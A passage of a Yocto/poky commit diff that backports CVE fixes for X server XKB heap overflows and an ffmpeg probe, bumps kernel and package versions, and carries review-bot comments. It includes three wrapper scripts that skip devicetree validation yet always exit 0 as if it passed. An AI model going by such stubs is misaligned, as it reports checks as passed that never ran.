+@@ -2639,6 +2726,11 @@ ProcXkbSetMap(ClientPtr client) + CHK_KBD_DEVICE(dev, stuff->deviceSpec, client, DixManageAccess); + CHK_MASK_LEGAL(0x01, stuff->present, XkbAllMapComponentsMask); + ++ /* first verify the request length carefully */ ++ rc = _XkbSetMapCheckLength(stuff); ++ if (rc != Success) ++ return rc; ++ + tmp = (char *) &stuff[1]; + + /* Check if we can to the SetMap on the requested device. If this diff --git a/poky/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-25712.patch b/poky/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-25712.patch new file mode 100644 index 0000000000..f39f6b32b1 --- /dev/null +++ b/poky/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-25712.patch 
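Review bot: `_add_check_len` expands to a bare `if (...) goto bad; else len += new`, which is fragile when used as a statement inside the unbraced and nested `if` blocks of `_XkbSetMapCheckLength()`; wrapping the body in `do { ... } while (0)` and writing `len += (new)` makes it safe to use anywhere. The comparison `len > req_len - (new)` is unsigned, so a short comment stating why a `new` larger than `req_len` is still rejected (the closing `len == req_len` test appears to be what catches it) would help the next reader. The `ErrorF` call prints two `size_t` values with `%ld`; `%zu` matches the type. The patch is a backport, so these belong upstream.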
@@ -0,0 +1,102 @@ +From 87c64fc5b0db9f62f4e361444f4b60501ebf67b9 Mon Sep 17 00:00:00 2001 +From: Matthieu Herrb <matthieu@herrb.eu> +Date: Sun, 11 Oct 2020 17:05:09 +0200 +Subject: [PATCH] Fix XkbSetDeviceInfo() and SetDeviceIndicators() heap + overflows + +ZDI-CAN 11389 / CVE-2020-25712 + +This vulnerability was discovered by: +Jan-Niklas Sohn working with Trend Micro Zero Day Initiative + +Signed-off-by: Matthieu Herrb <matthieu@herrb.eu> + +Upstream-Status: Backport +https://gitlab.freedesktop.org/xorg/xserver/-/commit/87c64fc5b0db9f62f4e361444f4b60501ebf67b9 +CVE: CVE-2020-25712 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + xkb/xkb.c | 26 +++++++++++++++++++++++--- + 1 file changed, 23 insertions(+), 3 deletions(-) + +Index: xorg-server-1.20.8/xkb/xkb.c +=================================================================== +--- xorg-server-1.20.8.orig/xkb/xkb.c ++++ xorg-server-1.20.8/xkb/xkb.c +@@ -6625,7 +6625,9 @@ SetDeviceIndicators(char *wire, + unsigned changed, + int num, + int *status_rtrn, +- ClientPtr client, xkbExtensionDeviceNotify * ev) ++ ClientPtr client, ++ xkbExtensionDeviceNotify * ev, ++ xkbSetDeviceInfoReq * stuff) + { + xkbDeviceLedsWireDesc *ledWire; + int i; +@@ -6646,6 +6648,11 @@ SetDeviceIndicators(char *wire, + xkbIndicatorMapWireDesc *mapWire; + XkbSrvLedInfoPtr sli; + ++ if (!_XkbCheckRequestBounds(client, stuff, ledWire, ledWire + 1)) { ++ *status_rtrn = BadLength; ++ return (char *) ledWire; ++ } ++ + namec = mapc = statec = 0; + sli = XkbFindSrvLedInfo(dev, ledWire->ledClass, ledWire->ledID, + XkbXI_IndicatorMapsMask); +@@ -6664,6 +6671,10 @@ SetDeviceIndicators(char *wire, + memset((char *) sli->names, 0, XkbNumIndicators * sizeof(Atom)); + for (n = 0, bit = 1; n < XkbNumIndicators; n++, bit <<= 1) { + if (ledWire->namesPresent & bit) { ++ if (!_XkbCheckRequestBounds(client, stuff, atomWire, atomWire + 1)) { ++ *status_rtrn = BadLength; ++ return (char *) atomWire; ++ } + sli->names[n] = (Atom) *atomWire; + if 
(sli->names[n] == None) + ledWire->namesPresent &= ~bit; +@@ -6681,6 +6692,10 @@ SetDeviceIndicators(char *wire, + if (ledWire->mapsPresent) { + for (n = 0, bit = 1; n < XkbNumIndicators; n++, bit <<= 1) { + if (ledWire->mapsPresent & bit) { ++ if (!_XkbCheckRequestBounds(client, stuff, mapWire, mapWire + 1)) { ++ *status_rtrn = BadLength; ++ return (char *) mapWire; ++ } + sli->maps[n].flags = mapWire->flags; + sli->maps[n].which_groups = mapWire->whichGroups; + sli->maps[n].groups = mapWire->groups; +@@ -6760,7 +6775,7 @@ _XkbSetDeviceInfoCheck(ClientPtr client, + ed.deviceID = dev->id; + wire = (char *) &stuff[1]; + if (stuff->change & XkbXI_ButtonActionsMask) { +- int nBtns, sz, i; ++ int nBtns, sz, i; + XkbAction *acts; + DeviceIntPtr kbd; + +@@ -6772,7 +6787,11 @@ _XkbSetDeviceInfoCheck(ClientPtr client, + return BadAlloc; + dev->button->xkb_acts = acts; + } ++ if (stuff->firstBtn + stuff->nBtns > nBtns) ++ return BadValue; + sz = stuff->nBtns * SIZEOF(xkbActionWireDesc); ++ if (!_XkbCheckRequestBounds(client, stuff, wire, (char *) wire + sz)) ++ return BadLength; + memcpy((char *) &acts[stuff->firstBtn], (char *) wire, sz); + wire += sz; + ed.reason |= XkbXI_ButtonActionsMask; +@@ -6793,7 +6812,8 @@ _XkbSetDeviceInfoCheck(ClientPtr client, + int status = Success; + + wire = SetDeviceIndicators(wire, dev, stuff->change, +- stuff->nDeviceLedFBs, &status, client, &ed); ++ stuff->nDeviceLedFBs, &status, client, &ed, ++ stuff); + if (status != Success) + return status; + } diff --git a/poky/meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.8.bb b/poky/meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.8.bb index 2af1b6f307..8c77c3756b 100644 --- a/poky/meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.8.bb +++ b/poky/meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.8.bb 
@@ -10,6 +10,8 @@ SRC_URI += "file://0001-xf86pciBus.c-use-Intel-ddx-only-for-pre-gen4-hardwar.pat file://CVE-2020-14361.patch \ file://CVE-2020-14362.patch \ file://CVE-2020-14345.patch \ + file://CVE-2020-14360.patch \ + file://CVE-2020-25712.patch \ " SRC_URI[md5sum] = "a770aec600116444a953ff632f51f839" SRC_URI[sha256sum] = "d17b646bee4ba0fb7850c1cc55b18e3e8513ed5c02bdf38da7e107f84e2d0146" diff --git a/poky/meta/recipes-kernel/blktrace/blktrace_git.bb b/poky/meta/recipes-kernel/blktrace/blktrace_git.bb index 7ccc022b93..2110bc75fa 100644 --- a/poky/meta/recipes-kernel/blktrace/blktrace_git.bb +++ b/poky/meta/recipes-kernel/blktrace/blktrace_git.bb @@ -14,7 +14,7 @@ SRCREV = "cca113f2fe0759b91fd6a0e10fdcda2c28f18a7e" PV = "1.2.0+git${SRCPV}" -SRC_URI = "git://git.kernel.dk/blktrace.git \ +SRC_URI = "git://git.kernel.dk/blktrace.git;branch=master \ file://ldflags.patch \ file://CVE-2018-10689.patch \ file://make-btt-scripts-python3-ready.patch \ diff --git a/poky/meta/recipes-kernel/cryptodev/cryptodev.inc b/poky/meta/recipes-kernel/cryptodev/cryptodev.inc index cf9b9b7207..f02619cabe 100644 --- a/poky/meta/recipes-kernel/cryptodev/cryptodev.inc +++ b/poky/meta/recipes-kernel/cryptodev/cryptodev.inc @@ -8,7 +8,7 @@ API is compatible with OpenBSD's cryptodev userspace API (/dev/crypto)." LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" -SRC_URI = "git://github.com/cryptodev-linux/cryptodev-linux \ +SRC_URI = "git://github.com/cryptodev-linux/cryptodev-linux;branch=master;protocol=https \ " SRCREV = "a87053bee5680878c295b7d23cf0d7065576ac2b" diff --git a/poky/meta/recipes-kernel/dtc/dtc.inc b/poky/meta/recipes-kernel/dtc/dtc.inc index 5da6c24fbf..461ab8fbd3 100644 --- a/poky/meta/recipes-kernel/dtc/dtc.inc +++ b/poky/meta/recipes-kernel/dtc/dtc.inc 
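Review bot: The updated blktrace `SRC_URI` still fetches over the plain `git://` transport, which is neither encrypted nor authenticated; the dtc, kern-tools-native, kmod and systemtap hunks in this commit do the same, while the cryptodev hunk gains `protocol=https`. `SRCREV` pins the commit, so a tampered fetch should fail to resolve the revision, but that leaves integrity resting on the pin alone. Where the host serves HTTPS I would add the parameter alongside the branch, for example `git://git.kernel.dk/blktrace.git;branch=master;protocol=https \`. Whether each of these hosts offers HTTPS at the same path needs checking before the change.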
@@ -5,7 +5,7 @@ SECTION = "bootloader" LICENSE = "GPLv2 | BSD" DEPENDS = "flex-native bison-native" -SRC_URI = "git://git.kernel.org/pub/scm/utils/dtc/dtc.git \ +SRC_URI = "git://git.kernel.org/pub/scm/utils/dtc/dtc.git;branch=master \ file://make_install.patch \ file://0001-dtc-Fix-Makefile-to-add-CFLAGS-not-override.patch \ " diff --git a/poky/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-doc-validate b/poky/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-doc-validate new file mode 100644 index 0000000000..2aa57851c7 --- /dev/null +++ b/poky/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-doc-validate @@ -0,0 +1,20 @@ +#!/bin/sh +# dt-doc-validate wrapper to allow kernel dt-validation to pass +# +# Copyright (C) 2021 Bruce Ashfield <bruce.ashfield@gmail.com> +# License: MIT (see COPYING.MIT at the root of the repository for terms) + +for arg; do + case "$arg" in + --version) + echo "v2021.10" + ;; + esac +done + +# TBD: left for future consideration +# exec dt-doc-validate.real "$@" + +# we always succeed +exit 0 + diff --git a/poky/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-mk-schema b/poky/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-mk-schema new file mode 100644 index 0000000000..24b89d8619 --- /dev/null +++ b/poky/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-mk-schema @@ -0,0 +1,20 @@ +#!/bin/sh +# dt-mk-schema wrapper to allow kernel dt-validation to pass +# +# Copyright (C) 2021 Bruce Ashfield <bruce.ashfield@gmail.com> +# License: MIT (see COPYING.MIT at the root of the repository for terms) + +for arg; do + case "$arg" in + --version) + echo "v2021.10" + ;; + esac +done + +# TBD: left for future consideration +# exec dt-mk-schema.real "$@" + +# we always succeed +exit 0 + diff --git a/poky/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-validate b/poky/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-validate new file mode 100644 index 0000000000..8a4710a7ed --- /dev/null 
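Review bot: The dt-doc-validate wrapper exits 0 without running anything, and dt-mk-schema and dt-validate are identical, so a kernel build that calls them reports devicetree validation as passed when it was in fact skipped. That is the stated intent, but nothing in the build output shows it. I would replace the `# we always succeed` comment with something like `# NOTE: validation is skipped, not performed; success here says nothing about the bindings`, and consider a stderr notice such as `echo "dt-doc-validate: wrapper stub, validation skipped" >&2`. The hard-coded `v2021.10` also has to be kept in step with the recipe version by hand, which deserves a comment next to the `echo`.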
+++ b/poky/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-validate @@ -0,0 +1,20 @@ +#!/bin/sh +# dt-validate wrapper to allow kernel dt-validation to pass +# +# Copyright (C) 2021 Bruce Ashfield <bruce.ashfield@gmail.com> +# License: MIT (see COPYING.MIT at the root of the repository for terms) + +for arg; do + case "$arg" in + --version) + echo "v2021.10" + ;; + esac +done + +# TBD: left for future consideration +# exec dt-validate.real "$@" + +# we always succeed +exit 0 + diff --git a/poky/meta/recipes-kernel/dtc/python3-dtschema-wrapper_2021.10.bb b/poky/meta/recipes-kernel/dtc/python3-dtschema-wrapper_2021.10.bb new file mode 100644 index 0000000000..c869274d09 --- /dev/null +++ b/poky/meta/recipes-kernel/dtc/python3-dtschema-wrapper_2021.10.bb @@ -0,0 +1,17 @@ +DESCRIPTION = "Wrapper for tooling for devicetree validation using YAML and jsonschema" +HOMEPAGE = "https://yoctoproject.org" +LICENSE = "MIT" +LIC_FILES_CHKSUM = "file://${COREBASE}/meta/COPYING.MIT;md5=3da9cfbcb788c80a0384361b4de20420" + +SRC_URI = "file://dt-doc-validate \ + file://dt-mk-schema \ + file://dt-validate" + +do_install() { + install -d ${D}${bindir}/ + install -m 755 ${WORKDIR}/dt-doc-validate ${D}${bindir}/ + install -m 755 ${WORKDIR}/dt-mk-schema ${D}${bindir}/ + install -m 755 ${WORKDIR}/dt-validate ${D}${bindir}/ +} + +BBCLASSEXTEND = "native nativesdk" diff --git a/poky/meta/recipes-kernel/kern-tools/kern-tools-native_git.bb b/poky/meta/recipes-kernel/kern-tools/kern-tools-native_git.bb index 3f76af424b..82d678e509 100644 --- a/poky/meta/recipes-kernel/kern-tools/kern-tools-native_git.bb +++ b/poky/meta/recipes-kernel/kern-tools/kern-tools-native_git.bb @@ -14,7 +14,7 @@ PV = "0.2+git${SRCPV}" inherit native -SRC_URI = "git://git.yoctoproject.org/yocto-kernel-tools.git" +SRC_URI = "git://git.yoctoproject.org/yocto-kernel-tools.git;branch=master" S = "${WORKDIR}/git" UPSTREAM_CHECK_COMMITS = "1" 
diff --git a/poky/meta/recipes-kernel/kmod/kmod.inc b/poky/meta/recipes-kernel/kmod/kmod.inc index bb678c6900..631b50658a 100644 --- a/poky/meta/recipes-kernel/kmod/kmod.inc +++ b/poky/meta/recipes-kernel/kmod/kmod.inc @@ -18,7 +18,7 @@ SRCREV = "58133a96c894c043e48c74ddf0bfe8db90bac62f" # Lookout for PV bump too when SRCREV is changed PV = "26" -SRC_URI = "git://git.kernel.org/pub/scm/utils/kernel/kmod/kmod.git \ +SRC_URI = "git://git.kernel.org/pub/scm/utils/kernel/kmod/kmod.git;branch=master \ file://depmod-search.conf \ file://0001-build-Stop-using-dolt.patch \ file://avoid_parallel_tests.patch \ diff --git a/poky/meta/recipes-kernel/linux-firmware/linux-firmware_20210511.bb b/poky/meta/recipes-kernel/linux-firmware/linux-firmware_20211216.bb index 513932984e..92b6ff5157 100644 --- a/poky/meta/recipes-kernel/linux-firmware/linux-firmware_20210511.bb +++ b/poky/meta/recipes-kernel/linux-firmware/linux-firmware_20211216.bb @@ -97,7 +97,7 @@ LIC_FILES_CHKSUM = "file://LICENCE.Abilis;md5=b5ee3f410780e56711ad48eadc22b8bc \ file://LICENSE.ice;md5=742ab4850f2670792940e6d15c974b2f \ file://LICENCE.IntcSST2;md5=9e7d8bea77612d7cc7d9e9b54b623062 \ file://LICENCE.it913x;md5=1fbf727bfb6a949810c4dbfa7e6ce4f8 \ - file://LICENCE.iwlwifi_firmware;md5=3fd842911ea93c29cd32679aa23e1c88 \ + file://LICENCE.iwlwifi_firmware;md5=2ce6786e0fc11ac6e36b54bb9b799f1b \ file://LICENCE.kaweth;md5=b1d876e562f4b3b8d391ad8395dfe03f \ file://LICENSE.Lontium;md5=4ec8dc582ff7295f39e2ca6a7b0be2b6 \ file://LICENCE.Marvell;md5=28b6ed8bd04ba105af6e4dcd6e997772 \ 
@@ -132,7 +132,7 @@ LIC_FILES_CHKSUM = "file://LICENCE.Abilis;md5=b5ee3f410780e56711ad48eadc22b8bc \ file://LICENCE.xc4000;md5=0ff51d2dc49fce04814c9155081092f0 \ file://LICENCE.xc5000;md5=1e170c13175323c32c7f4d0998d53f66 \ file://LICENCE.xc5000c;md5=12b02efa3049db65d524aeb418dd87ca \ - file://WHENCE;md5=727d0d4e2d420f41d89d098f6322e779 \ + file://WHENCE;md5=79f477f9d53eedee5a65b45193785963 \ " # These are not common licenses, set NO_GENERIC_LICENSE for them @@ -205,7 +205,7 @@ PE = "1" SRC_URI = "${KERNELORG_MIRROR}/linux/kernel/firmware/${BPN}-${PV}.tar.xz" -SRC_URI[sha256sum] = "2aa6ae8b9808408f9811ac38f00c188e53e984a2b3990254f6c9c02c1ab13417" +SRC_URI[sha256sum] = "eeddb4e6bef31fd1a3757f12ccc324929bbad97855c0b9ec5ed780f74de1837d" inherit allarch diff --git a/poky/meta/recipes-kernel/linux/linux-yocto-rt_5.4.bb b/poky/meta/recipes-kernel/linux/linux-yocto-rt_5.4.bb index 53e6982619..9e8281c7a1 100644 --- a/poky/meta/recipes-kernel/linux/linux-yocto-rt_5.4.bb +++ b/poky/meta/recipes-kernel/linux/linux-yocto-rt_5.4.bb @@ -11,13 +11,13 @@ python () { raise bb.parse.SkipRecipe("Set PREFERRED_PROVIDER_virtual/kernel to linux-yocto-rt to enable it") } -SRCREV_machine ?= "e823f31a48749bf1d01a86c274fcec87fae1e5ba" -SRCREV_meta ?= "71f799f448d405a35d88ecee0aba3ec2b198d542" +SRCREV_machine ?= "e92d76afe6d8592917c0e7b948912c085e661df2" +SRCREV_meta ?= "98cce1c95fcc9a26965cbc5f038fd71d53c387c8" SRC_URI = "git://git.yoctoproject.org/linux-yocto.git;branch=${KBRANCH};name=machine \ git://git.yoctoproject.org/yocto-kernel-cache;type=kmeta;name=meta;branch=yocto-5.4;destsuffix=${KMETA}" -LINUX_VERSION ?= "5.4.141" +LINUX_VERSION ?= "5.4.172" LIC_FILES_CHKSUM = "file://COPYING;md5=bbea815ee2795b2f4230826c0c6b8814" diff --git a/poky/meta/recipes-kernel/linux/linux-yocto-tiny_5.4.bb b/poky/meta/recipes-kernel/linux/linux-yocto-tiny_5.4.bb index 44a033d5cb..a75570df93 100644 --- a/poky/meta/recipes-kernel/linux/linux-yocto-tiny_5.4.bb 
+++ b/poky/meta/recipes-kernel/linux/linux-yocto-tiny_5.4.bb @@ -6,7 +6,7 @@ KCONFIG_MODE = "--allnoconfig" require recipes-kernel/linux/linux-yocto.inc -LINUX_VERSION ?= "5.4.141" +LINUX_VERSION ?= "5.4.172" LIC_FILES_CHKSUM = "file://COPYING;md5=bbea815ee2795b2f4230826c0c6b8814" DEPENDS += "${@bb.utils.contains('ARCH', 'x86', 'elfutils-native', '', d)}" @@ -15,9 +15,9 @@ DEPENDS += "openssl-native util-linux-native" KMETA = "kernel-meta" KCONF_BSP_AUDIT_LEVEL = "2" -SRCREV_machine_qemuarm ?= "63d08f6ee3425e9d94eccf3a75a9ec4e474df916" -SRCREV_machine ?= "05b2de44f781a297be454242d77f619189dfc6f4" -SRCREV_meta ?= "71f799f448d405a35d88ecee0aba3ec2b198d542" +SRCREV_machine_qemuarm ?= "10b4756eee78aa43ff9ed64da700ec6e8d97ff22" +SRCREV_machine ?= "6ab93fdc53b64e146e4f16363375c1beb37b82e4" +SRCREV_meta ?= "98cce1c95fcc9a26965cbc5f038fd71d53c387c8" PV = "${LINUX_VERSION}+git${SRCPV}" diff --git a/poky/meta/recipes-kernel/linux/linux-yocto_5.4.bb b/poky/meta/recipes-kernel/linux/linux-yocto_5.4.bb index 0e41d734df..2d7f7559e5 100644 --- a/poky/meta/recipes-kernel/linux/linux-yocto_5.4.bb +++ b/poky/meta/recipes-kernel/linux/linux-yocto_5.4.bb 
@@ -12,16 +12,16 @@ KBRANCH_qemux86 ?= "v5.4/standard/base" KBRANCH_qemux86-64 ?= "v5.4/standard/base" KBRANCH_qemumips64 ?= "v5.4/standard/mti-malta64" -SRCREV_machine_qemuarm ?= "91a35a54a7b2d4d558b3f8b24c39657a3ff71c7c" -SRCREV_machine_qemuarm64 ?= "a8edc7f1b004c6fb56d142fba3e688ba2a051b54" -SRCREV_machine_qemumips ?= "4f1c4fc19e8d2cb994dac34fb8bb32a7c776b318" -SRCREV_machine_qemuppc ?= "7bb64db24c2b7bd2b6656036009bd71618eb125d" -SRCREV_machine_qemuriscv64 ?= "13fa9f66484db2492ee09667f45ad3e52e5b35ac" -SRCREV_machine_qemux86 ?= "13fa9f66484db2492ee09667f45ad3e52e5b35ac" -SRCREV_machine_qemux86-64 ?= "13fa9f66484db2492ee09667f45ad3e52e5b35ac" -SRCREV_machine_qemumips64 ?= "931ad0c17451151dd3ddfb27dc2e33965f90ce86" -SRCREV_machine ?= "13fa9f66484db2492ee09667f45ad3e52e5b35ac" -SRCREV_meta ?= "71f799f448d405a35d88ecee0aba3ec2b198d542" +SRCREV_machine_qemuarm ?= "8de1da3dc354dedef2e435e694eec6d6e72c9822" +SRCREV_machine_qemuarm64 ?= "eed7c0a64f3a7a91a130bc2e507304dc8b446a31" +SRCREV_machine_qemumips ?= "996a9660e4fab70db5cecec9c831141cd03c3d36" +SRCREV_machine_qemuppc ?= "0197cf5754b1bd4eb035c342af9cc27e8c3339ca" +SRCREV_machine_qemuriscv64 ?= "c6b015510134942076c0e111e56357656acf3dd5" +SRCREV_machine_qemux86 ?= "c6b015510134942076c0e111e56357656acf3dd5" +SRCREV_machine_qemux86-64 ?= "c6b015510134942076c0e111e56357656acf3dd5" +SRCREV_machine_qemumips64 ?= "fe2769a7c268ed224ec70fd2aaab850e4eef70dc" +SRCREV_machine ?= "c6b015510134942076c0e111e56357656acf3dd5" +SRCREV_meta ?= "98cce1c95fcc9a26965cbc5f038fd71d53c387c8" # remap qemuarm to qemuarma15 for the 5.4 kernel # KMACHINE_qemuarm ?= "qemuarma15" 
@@ -30,7 +30,7 @@ SRC_URI = "git://git.yoctoproject.org/linux-yocto.git;name=machine;branch=${KBRA git://git.yoctoproject.org/yocto-kernel-cache;type=kmeta;name=meta;branch=yocto-5.4;destsuffix=${KMETA}" LIC_FILES_CHKSUM = "file://COPYING;md5=bbea815ee2795b2f4230826c0c6b8814" -LINUX_VERSION ?= "5.4.141" +LINUX_VERSION ?= "5.4.172" DEPENDS += "${@bb.utils.contains('ARCH', 'x86', 'elfutils-native', '', d)}" DEPENDS += "openssl-native util-linux-native" diff --git a/poky/meta/recipes-kernel/lttng/lttng-modules_2.11.6.bb b/poky/meta/recipes-kernel/lttng/lttng-modules_2.11.6.bb index 3fdc8094e9..3145f0298c 100644 --- a/poky/meta/recipes-kernel/lttng/lttng-modules_2.11.6.bb +++ b/poky/meta/recipes-kernel/lttng/lttng-modules_2.11.6.bb @@ -39,7 +39,9 @@ EXTRA_OEMAKE += "KERNELDIR='${STAGING_KERNEL_DIR}'" do_install_append() { # Delete empty directories to avoid QA failures if no modules were built - find ${D}/${nonarch_base_libdir} -depth -type d -empty -exec rmdir {} \; + if [ -d ${D}/${nonarch_base_libdir} ]; then + find ${D}/${nonarch_base_libdir} -depth -type d -empty -exec rmdir {} \; + fi } python do_package_prepend() { diff --git a/poky/meta/recipes-kernel/lttng/lttng-tools_2.11.5.bb b/poky/meta/recipes-kernel/lttng/lttng-tools_2.11.5.bb index e830475d0d..6306193809 100644 --- a/poky/meta/recipes-kernel/lttng/lttng-tools_2.11.5.bb +++ b/poky/meta/recipes-kernel/lttng/lttng-tools_2.11.5.bb @@ -10,7 +10,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=01d7fc4496aacf37d90df90b90b0cac1 \ file://gpl-2.0.txt;md5=b234ee4d69f5fce4486a80fdaf4a4263 \ file://lgpl-2.1.txt;md5=0f0d71500e6a57fd24d825f33242b9ca" -DEPENDS = "liburcu popt libxml2 util-linux" +DEPENDS = "liburcu popt libxml2 util-linux bison-native" RDEPENDS_${PN} = "libgcc" RDEPENDS_${PN}-ptest += "make perl bash gawk babeltrace procps perl-module-overloading coreutils util-linux kmod lttng-modules sed python3-core" RDEPENDS_${PN}-ptest_append_libc-glibc = " glibc-utils" 
diff --git a/poky/meta/recipes-kernel/make-mod-scripts/make-mod-scripts_1.0.bb b/poky/meta/recipes-kernel/make-mod-scripts/make-mod-scripts_1.0.bb index b58fa9a603..f9df345ca5 100644 --- a/poky/meta/recipes-kernel/make-mod-scripts/make-mod-scripts_1.0.bb +++ b/poky/meta/recipes-kernel/make-mod-scripts/make-mod-scripts_1.0.bb @@ -19,7 +19,7 @@ DEPENDS += "bc-native bison-native" DEPENDS += "gmp-native" EXTRA_OEMAKE = " HOSTCC="${BUILD_CC} ${BUILD_CFLAGS} ${BUILD_LDFLAGS}" HOSTCPP="${BUILD_CPP}"" -EXTRA_OEMAKE += " HOSTCXX="${BUILD_CXX} ${BUILD_CXXFLAGS} ${BUILD_LDFLAGS}"" +EXTRA_OEMAKE += " HOSTCXX="${BUILD_CXX} ${BUILD_CXXFLAGS} ${BUILD_LDFLAGS}" CROSS_COMPILE=${TARGET_PREFIX}" # Build some host tools under work-shared. CC, LD, and AR are probably # not used, but this is the historical way of invoking "make scripts". diff --git a/poky/meta/recipes-kernel/powertop/powertop_2.10.bb b/poky/meta/recipes-kernel/powertop/powertop_2.10.bb index ffa3b4685c..dcbba2fd5c 100644 --- a/poky/meta/recipes-kernel/powertop/powertop_2.10.bb +++ b/poky/meta/recipes-kernel/powertop/powertop_2.10.bb @@ -6,7 +6,7 @@ DEPENDS = "ncurses libnl pciutils autoconf-archive" LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://COPYING;md5=12f884d2ae1ff87c09e5b7ccc2c4ca7e" -SRC_URI = "git://github.com/fenrus75/powertop;protocol=https \ +SRC_URI = "git://github.com/fenrus75/powertop;protocol=https;branch=master \ file://0001-wakeup_xxx.h-include-limits.h.patch \ file://0002-configure.ac-ax_add_fortify_source.patch \ file://0003-configure-Use-AX_REQUIRE_DEFINED.patch \ diff --git a/poky/meta/recipes-kernel/systemtap/systemtap_git.inc b/poky/meta/recipes-kernel/systemtap/systemtap_git.inc index 116e83fe0f..af55f15fd4 100644 --- a/poky/meta/recipes-kernel/systemtap/systemtap_git.inc +++ b/poky/meta/recipes-kernel/systemtap/systemtap_git.inc 
@@ -3,7 +3,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" SRCREV = "044a0640985ef007c0b2fb6eaf660d9d51800cda" PV = "4.2" -SRC_URI = "git://sourceware.org/git/systemtap.git \ +SRC_URI = "git://sourceware.org/git/systemtap.git;branch=master \ file://0001-Do-not-let-configure-write-a-python-location-into-th.patch \ file://0001-Install-python-modules-to-correct-library-dir.patch \ file://0001-staprun-stapbpf-don-t-support-installing-a-non-root.patch \ diff --git a/poky/meta/recipes-kernel/wireless-regdb/wireless-regdb_2021.04.21.bb b/poky/meta/recipes-kernel/wireless-regdb/wireless-regdb_2021.08.28.bb index f79c0b29ea..376311804e 100644 --- a/poky/meta/recipes-kernel/wireless-regdb/wireless-regdb_2021.04.21.bb +++ b/poky/meta/recipes-kernel/wireless-regdb/wireless-regdb_2021.08.28.bb @@ -5,7 +5,7 @@ LICENSE = "ISC" LIC_FILES_CHKSUM = "file://LICENSE;md5=07c4f6dea3845b02a18dc00c8c87699c" SRC_URI = "https://www.kernel.org/pub/software/network/${BPN}/${BP}.tar.xz" -SRC_URI[sha256sum] = "9e4c02b2a9710df4dbdb327c39612e8cbbae6495987afeddaebab28c1ea3d8fa" +SRC_URI[sha256sum] = "cff370c410d1e6d316ae0a7fa8ac6278fdf1efca5d3d664aca7cfd2aafa54446" inherit bin_package allarch diff --git a/poky/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-3566.patch b/poky/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-3566.patch new file mode 100644 index 0000000000..abfc024820 --- /dev/null +++ b/poky/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-3566.patch 
@@ -0,0 +1,61 @@ +From 3bce9e9b3ea35c54bacccc793d7da99ea5157532 Mon Sep 17 00:00:00 2001 +From: Paul B Mahol <onemda@gmail.com> +Date: Mon, 27 Jan 2020 21:53:08 +0100 +Subject: [PATCH] avformat/tty: add probe function + +CVE: CVE-2021-3566 +Signed-off-by: Saloni Jain <salonij@kpit.com> + +Upstream-Status: Backport [http://git.videolan.org/?p=ffmpeg.git;a=patch;h=3bce9e9b3ea35c54bacccc793d7da99ea5157532] +Comment: No changes/refreshing done. +--- + libavformat/tty.c | 21 ++++++++++++++++++++- + 1 file changed, 20 insertions(+), 1 deletion(-) + +diff --git a/libavformat/tty.c b/libavformat/tty.c +index 8d48f2c45c12..60f7e9f87ee7 100644 +--- a/libavformat/tty.c ++++ b/libavformat/tty.c +@@ -34,6 +34,13 @@ + #include "internal.h" + #include "sauce.h" + ++static int isansicode(int x) ++{ ++ return x == 0x1B || x == 0x0A || x == 0x0D || (x >= 0x20 && x < 0x7f); ++} ++ ++static const char tty_extensions[31] = "ans,art,asc,diz,ice,nfo,txt,vt"; ++ + typedef struct TtyDemuxContext { + AVClass *class; + int chars_per_frame; +@@ -42,6 +49,17 @@ typedef struct TtyDemuxContext { + AVRational framerate; /**< Set by a private option. */ + } TtyDemuxContext; + ++static int read_probe(const AVProbeData *p) ++{ ++ int cnt = 0; ++ ++ for (int i = 0; i < p->buf_size; i++) ++ cnt += !!isansicode(p->buf[i]); ++ ++ return (cnt * 100LL / p->buf_size) * (cnt > 400) * ++ !!av_match_ext(p->filename, tty_extensions); ++} ++ + /** + * Parse EFI header + */ +@@ -153,8 +171,9 @@ AVInputFormat ff_tty_demuxer = { + .name = "tty", + .long_name = NULL_IF_CONFIG_SMALL("Tele-typewriter"), + .priv_data_size = sizeof(TtyDemuxContext), ++ .read_probe = read_probe, + .read_header = read_header, + .read_packet = read_packet, +- .extensions = "ans,art,asc,diz,ice,nfo,txt,vt", ++ .extensions = tty_extensions, + .priv_class = &tty_demuxer_class, + }; 
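Review bot: In the added `read_probe()`, the expression `cnt * 100LL / p->buf_size` divides by the probe buffer size with no check that it is non-zero. Whether a caller can pass an empty probe buffer is not visible from this patch, but if one can, this is a division by zero reachable from input handling. A guard at the top of the function, `if (!p->buf_size) return 0;`, would make the probe safe in either case. Since the patch is carried as an unmodified backport, picking up a corresponding upstream follow-up (if one exists) is preferable to editing this file by hand.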
diff --git a/poky/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-38291.patch b/poky/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-38291.patch
new file mode 100644
index 0000000000..e5be985fc3
--- /dev/null
+++ b/poky/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-38291.patch
